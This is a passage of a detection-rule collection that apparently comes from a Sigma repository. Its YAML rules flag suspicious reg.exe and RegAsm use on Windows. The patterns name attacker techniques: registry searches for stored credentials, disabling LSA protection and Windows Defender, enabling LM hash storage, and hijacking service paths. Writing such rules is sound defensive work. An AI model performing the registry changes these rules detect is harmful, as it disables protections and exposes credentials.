    "content": "title: Windows Recall Feature Enabled Via Reg.EXE\nid: 817f252c-5143-4dae-b418-48c3e9f63728\nrelated:\n    - id: 5dfc1465-8f65-4fde-8eb5-6194380c6a62\n      type: similar\n    - id: 75180c5f-4ea1-461a-a4f6-6e4700c065d4\n      type: similar\nstatus: test\ndescription: |\n    Detects the enabling of the Windows Recall feature via registry manipulation.\n    Windows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" value, or setting it to 0.\n    Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\n    This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/client-management/manage-recall\n    - https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis\nauthor: Sajid Nawaz Khan\ndate: 2024-06-02\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_value:\n        # HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        # HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        CommandLine|contains|all:\n            - 'Microsoft\\Windows\\WindowsAI'\n            - 'DisableAIDataAnalysis'\n    selection_action_add:\n        CommandLine|contains:\n            - 'add'\n            - '0'\n    selection_action_delete:\n        CommandLine|contains: 'delete'\n    condition: selection_img and selection_value and 1 of selection_action_*\nfalsepositives:\n    - Legitimate use/activation of Windows Recall\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml",
    "content": "title: Enumeration for Credentials in Registry\nid: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1\nstatus: test\ndescription: |\n    Adversaries may search the Registry on compromised systems for insecurely stored credentials.\n    The Windows Registry stores configuration information that can be used by the system or other programs.\n    Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md\nauthor: frack113\ndate: 2021-12-20\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1552.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    reg:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains|all:\n            - ' query '\n            - '/t '\n            - 'REG_SZ'\n            - '/s'\n    hive:\n        - CommandLine|contains|all:\n              - '/f '\n              - 'HKLM'\n        - CommandLine|contains|all:\n              - '/f '\n              - 'HKCU'\n        - CommandLine|contains: 'HKCU\\Software\\SimonTatham\\PuTTY\\Sessions'\n    condition: reg and hive\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml",
    "content": "title: Potential Suspicious Registry File Imported Via Reg.EXE\nid: 62e0298b-e994-4189-bc87-bc699aa62d97\nrelated:\n    - id: 73bba97f-a82d-42ce-b315-9182e76c57b1\n      type: derived\nstatus: test\ndescription: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import\nauthor: frack113, Nasreddine Bencherchali\ndate: 2022-08-01\nmodified: 2023-02-05\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli:\n        CommandLine|contains: ' import '\n    selection_paths:\n        CommandLine|contains:\n            - 'C:\\Users\\'\n            - '%temp%'\n            - '%tmp%'\n            - '%appdata%'\n            - '\\AppData\\Local\\Temp\\'\n            - 'C:\\Windows\\Temp\\'\n            - 'C:\\ProgramData\\'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate import of keys\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml",
    "content": "title: RestrictedAdminMode Registry Value Tampering - ProcCreation\nid: 28ac00d6-22d9-4a3c-927f-bbd770104573\nrelated:\n    - id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 # Registry\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the \"DisableRestrictedAdmin\" registry value in order to disable or enable RestrictedAdmin mode.\n    RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\n    This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md\n    - https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\nauthor: frack113\ndate: 2023-01-13\nmodified: 2025-08-28\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\System\\CurrentControlSet\\Control\\Lsa'\n            - 'DisableRestrictedAdmin'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml",
    "content": "title: LSA PPL Protection Disabled Via Reg.EXE\nid: 8c0eca51-0f88-4db2-9183-fdfb10c703f9\nstatus: test\ndescription: Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process\nreferences:\n    - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-22\nmodified: 2023-03-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli:\n        CommandLine|contains: 'SYSTEM\\CurrentControlSet\\Control\\Lsa'\n        CommandLine|contains|all:\n            - ' add '\n            - ' /d 0'\n            - ' /v RunAsPPL '\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_machineguid.yml",
    "content": "title: Suspicious Query of MachineGUID\nid: f5240972-3938-4e56-8e4b-e33893176c1f\nstatus: test\ndescription: Use of reg to get MachineGuid information\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery\nauthor: frack113\ndate: 2022-01-01\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains|all:\n            - 'SOFTWARE\\Microsoft\\Cryptography'\n            - '/v '\n            - 'MachineGuid'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml",
    "content": "title: Modify Group Policy Settings\nid: ada4b0c4-758b-46ac-9033-9004613a150d\nrelated:\n    - id: b7216a7d-687e-4c8d-82b1-3080b2ad961f\n      type: similar\nstatus: test\ndescription: Detect malicious GPO modifications can be used to implement many other malicious behaviors.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md\nauthor: frack113\ndate: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_path:\n        CommandLine|contains: '\\SOFTWARE\\Policies\\Microsoft\\Windows\\System'\n    selection_key:\n        CommandLine|contains:\n            - GroupPolicyRefreshTimeDC\n            - GroupPolicyRefreshTimeOffsetDC\n            - GroupPolicyRefreshTime\n            - GroupPolicyRefreshTimeOffset\n            - EnableSmartScreen\n            - ShellSmartScreenLevel\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_nolmhash.yml",
    "content": "title: Enable LM Hash Storage - ProcCreation\nid: 98dedfdd-8333-49d4-9f23-d7018cccae53\nrelated:\n    - id: c420410f-c2d8-4010-856b-dffe21866437 # Registry\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\n    By setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password\n    - https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-12-15\nmodified: 2023-12-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\System\\CurrentControlSet\\Control\\Lsa'\n            - 'NoLMHash'\n            - ' 0'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_query_registry.yml",
    "content": "title: Potential Configuration And Service Reconnaissance Via Reg.EXE\nid: 970007b7-ce32-49d0-a4a4-fbef016950bd\nstatus: test\ndescription: Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-02-05\ntags:\n    - attack.discovery\n    - attack.t1012\n    - attack.t1007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_flag:\n        CommandLine|contains: 'query'\n    selection_key:\n        CommandLine|contains:\n            - 'currentVersion\\windows'\n            - 'winlogon\\'\n            - 'currentVersion\\shellServiceObjectDelayLoad'\n            - 'currentVersion\\run' # Also covers the strings \"RunOnce\", \"RunOnceEx\" and \"runServicesOnce\"\n            - 'currentVersion\\policies\\explorer\\run'\n            - 'currentcontrolset\\services'\n    condition: all of selection_*\nfalsepositives:\n    - Discord\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml",
    "content": "title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE\nid: 0d5675be-bc88-4172-86d3-1e96a4476536\nstatus: test\ndescription: Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values\nreferences:\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\n    - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contain description for most of the keys mentioned here (check it out if you want more information\n    - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique\n    - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contain description for most of the keys mentioned here (check it out if you want more information)\n    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\n    - https://blog.sekoia.io/darkgate-internals/\n    - https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/\n    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry\n    - https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry\n    - https://github.com/redcanaryco/atomic-red-team/blob/dd526047b8c399c312fee47d1e6fb531164da54d/atomics/T1112/T1112.yaml#L790\n    - https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-rdp-winstationextensions-securitylayer\n    - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html\n    - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique\n    - https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the \"ServiceDll\" key\n    - https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html\nauthor: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport\ndate: 2022-02-12\nmodified: 2025-11-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1021.001\n    - attack.t1112\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_main_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_main_cli:\n        CommandLine|contains|all:\n            - ' add '\n            - '\\CurrentControlSet\\Control\\Terminal Server'\n            - 'REG_DWORD'\n            - ' /f'\n    selection_values_1:\n        CommandLine|contains|all:\n            - 'Licensing Core'\n            - 'EnableConcurrentSessions'\n    selection_values_2:\n        CommandLine|contains:\n            - 'AllowTSConnections'\n            - 'fDenyTSConnections'\n            - 'fEnableWinStation'\n            - 'fSingleSessionPerUser'\n            - 'IdleWinStationPoolCount'\n            - 'MaxInstanceCount'\n            - 'SecurityLayer'\n            - 'TSAdvertise'\n            - 'TSAppCompat'\n            - 'TSEnabled'\n            - 'TSUserEnabled'\n            - 'WinStations\\RDP-Tcp'\n    filter_main_values_tls:\n        CommandLine|contains|all:\n            - 'SecurityLayer'\n            - '02'  # TLS Enabled\n    condition: all of selection_main_* and 1 of selection_values_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_screensaver.yml",
    "content": "title: Suspicious ScreenSave Change by Reg.exe\nid: 0fc35fc3-efe6-4898-8a37-0b233339524f\nstatus: test\ndescription: |\n    Adversaries may establish persistence by executing malicious content triggered by user inactivity.\n    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md\n    - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf\nauthor: frack113\ndate: 2021-08-19\nmodified: 2022-06-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains:\n            - 'HKEY_CURRENT_USER\\Control Panel\\Desktop'\n            - 'HKCU\\Control Panel\\Desktop'\n    selection_option_1: # /force Active ScreenSaveActive\n        CommandLine|contains|all:\n            - '/v ScreenSaveActive'\n            - '/t REG_SZ'\n            - '/d 1'\n            - '/f'\n    selection_option_2: # /force  set ScreenSaveTimeout\n        CommandLine|contains|all:\n            - '/v ScreenSaveTimeout'\n            - '/t REG_SZ'\n            - '/d '\n            - '/f'\n    selection_option_3: # /force set ScreenSaverIsSecure\n        CommandLine|contains|all:\n            - '/v ScreenSaverIsSecure'\n            - '/t REG_SZ'\n            - '/d 0'\n            - '/f'\n    selection_option_4: # /force set a .scr\n        CommandLine|contains|all:\n            - '/v SCRNSAVE.EXE'\n            - '/t REG_SZ'\n            - '/d '\n            - '.scr'\n            - '/f'\n    condition: selection_reg and 1 of selection_option_*\nfalsepositives:\n    - GPO\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml",
    "content": "title: Changing Existing Service ImagePath Value Via Reg.EXE\nid: 9b0b7ac3-6223-47aa-a3fd-e8f211e637db\nstatus: test\ndescription: |\n    Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\n    Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\n    Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe\nauthor: frack113\ndate: 2021-12-30\nmodified: 2024-03-13\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains|all:\n            - 'add '\n            - 'SYSTEM\\CurrentControlSet\\Services\\'\n            - ' ImagePath '\n    selection_value:\n        CommandLine|contains|windash: ' -d '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml",
    "content": "title: Detected Windows Software Discovery\nid: e13f668e-7f95-443d-98d2-1816a7648a7b\nrelated:\n    - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282\n      type: derived\nstatus: test\ndescription: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md\n    - https://github.com/harleyQu1nn/AggressorScripts # AVQuery.cna\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-16\nmodified: 2022-10-09\ntags:\n    - attack.discovery\n    - attack.t1518\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'    # Example: reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion\n        CommandLine|contains|all:\n            - 'query'\n            - '\\software\\'\n            - '/v'\n            - 'svcversion'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml",
    "content": "title: Reg Add Suspicious Paths\nid: b7e2a8d4-74bb-4b78-adc9-3f92af2d4829\nstatus: test\ndescription: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2022-10-10\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_path:\n        CommandLine|contains:\n            # Add more suspicious registry locations below\n            - '\\AppDataLow\\Software\\Microsoft\\'\n            - '\\Policies\\Microsoft\\Windows\\OOBE'\n            - '\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon'\n            - '\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'\n            - '\\Microsoft\\Windows Defender\\'\n    condition: all of selection_*\nfalsepositives:\n    - Rare legitimate add to registry via cli (to these locations)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_system_language_discovery.yml",
    "content": "title: System Language Discovery via Reg.Exe\nid: c43a5405-e8e1-4221-9ac9-dbe3fa14e886\nstatus: experimental\ndescription: |\n    Detects the usage of Reg.Exe to query system language settings.\n    Attackers may discover the system language to determine the geographic location of victims, customize payloads for specific regions,\n    or avoid targeting certain locales to evade detection.\nreferences:\n    - https://scythe.io/threat-thursday/threatthursday-darkside-ransomware\nauthor: Marco Pedrinazzi (@pedrinazziM) (InTheCyber)\ndate: 2026-01-09\ntags:\n    - attack.discovery\n    - attack.t1614.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'query'\n            - 'Control\\Nls\\Language'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Discover System Language by Registry Query\n      technique: T1614.001\n      atomic_guid: 631d4cf1-42c9-4209-8fe9-6bd4de9421be\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_volsnap_disable.yml",
    "content": "title: Disabled Volume Snapshots\nid: dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a\nstatus: test\ndescription: Detects commands that temporarily turn off Volume Snapshots\nreferences:\n    - https://twitter.com/0gtweet/status/1354766164166115331\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-28\nmodified: 2023-12-15\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\Services\\VSS\\Diag'\n            - '/d Disabled'\n    condition: selection\nfalsepositives:\n    - Legitimate administration\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml",
    "content": "title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE\nid: 452bce90-6fb0-43cc-97a5-affc283139b3\nstatus: test\ndescription: |\n    Detects the usage of \"reg.exe\" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection\nreferences:\n    - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\n    - https://github.com/swagkarna/Defeat-Defender-V1.2.0/tree/ae4059c4276da6f6303b8f53cdff085ecae88a91\n    - https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2\n    - https://tria.ge/241231-j9yatstqbm/behavioral1\nauthor: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-03-22\nmodified: 2025-06-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_root_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_root_path:\n        CommandLine|contains:\n            - 'SOFTWARE\\Microsoft\\Windows Defender\\'\n            - 'SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center'\n            - 'SOFTWARE\\Policies\\Microsoft\\Windows Defender\\'\n    selection_dword_0:\n        CommandLine|contains|all:\n            - ' add '\n            - 'd 0'\n        CommandLine|contains:\n            - 'DisallowExploitProtectionOverride'\n            - 'EnableControlledFolderAccess'\n            - 'MpEnablePus'\n            - 'PUAProtection'\n            - 'SpynetReporting'\n            - 'SubmitSamplesConsent'\n            - 'TamperProtection'\n    selection_dword_1:\n        CommandLine|contains|all:\n            - ' add '\n            - 'd 1'\n        CommandLine|contains:\n            - 'DisableAccess'\n            - 'DisableAntiSpyware'\n            - 'DisableAntiSpywareRealtimeProtection'\n            - 'DisableAntiVirus'\n            - 'DisableAntiVirusSignatures'\n            - 'DisableArchiveScanning'\n            - 'DisableBehaviorMonitoring'\n            - 'DisableBlockAtFirstSeen'\n            - 'DisableCloudProtection'\n            - 'DisableConfig'\n            - 'DisableEnhancedNotifications'\n            - 'DisableIntrusionPreventionSystem'\n            - 'DisableIOAVProtection'\n            - 'DisableNetworkProtection'\n            - 'DisableOnAccessProtection'\n            - 'DisablePrivacyMode'\n            - 'DisableRealtimeMonitoring'\n            - 'DisableRoutinelyTakingAction'\n            - 'DisableScanOnRealtimeEnable'\n            - 'DisableScriptScanning'\n            - 'DisableSecurityCenter'\n            - 'Notification_Suppress'\n            - 'SignatureDisableUpdateOnStartupWithoutEngine'\n    condition: all of selection_root_* and 1 of selection_dword_*\nfalsepositives:\n    - Rare legitimate use by administrators to test software (should always be investigated)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml",
    "content": "title: Write Protect For Storage Disabled\nid: 75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13\nstatus: test\ndescription: |\n    Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.\n    This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.\nreferences:\n    - https://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html\nauthor: Sreeman\ndate: 2021-06-11\nmodified: 2024-01-18\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\System\\CurrentControlSet\\Control'\n            - 'Write Protection'\n            - '0'\n            - 'storage'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regasm_no_flag_or_dll_execution.yml",
    "content": "title: RegAsm.EXE Execution Without CommandLine Flags or Files\nid: 651f87f7-12db-47f9-84c5-f27b081b94b6\nstatus: experimental\ndescription: |\n    Detects the execution of \"RegAsm.exe\" without a commandline flag or file, which might indicate potential process injection activity.\n    Usually \"RegAsm.exe\" should point to a dedicated DLL file or call the help with the \"/?\" flag.\nreferences:\n    - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/\n    - https://www.zscaler.fr/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla\n    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool\n    - https://app.any.run/tasks/ea944b89-69d8-49c8-ac1f-5c76ad300db2\n    - https://www.joesandbox.com/analysis/1467354/0/html\nauthor: frack113\ndate: 2025-06-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218.009\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\RegAsm.exe'\n        - OriginalFileName: 'RegAsm.exe'\n    selection_cli:\n        CommandLine|endswith:\n            - 'RegAsm'\n            - 'RegAsm.exe'\n            - 'RegAsm.exe\"'\n            - \"RegAsm.exe'\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of Regasm by developers.\n# Note: You can increase after an initial baseline\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml",
    "content": "title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension\nid: e9f8f8cc-07cc-4e81-b724-f387db9175e4\nrelated:\n    - id: cc368ed0-2411-45dc-a222-510ace303cb2\n      type: derived\nstatus: test\ndescription: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.\nreferences:\n    - https://www.fortiguard.com/threat-signal-report/4718?s=09\n    - https://lolbas-project.github.io/lolbas/Binaries/Regasm/\n    - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\Regsvcs.exe'\n              - '\\Regasm.exe'\n        - OriginalFileName:\n              - 'RegSvcs.exe'\n              - 'RegAsm.exe'\n    selection_extension:\n        CommandLine|contains:\n            # Note: Add more potentially uncommon extensions\n            - '.dat'\n            - '.gif'\n            - '.jpeg'\n            - '.jpg'\n            - '.png'\n            - '.txt'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml",
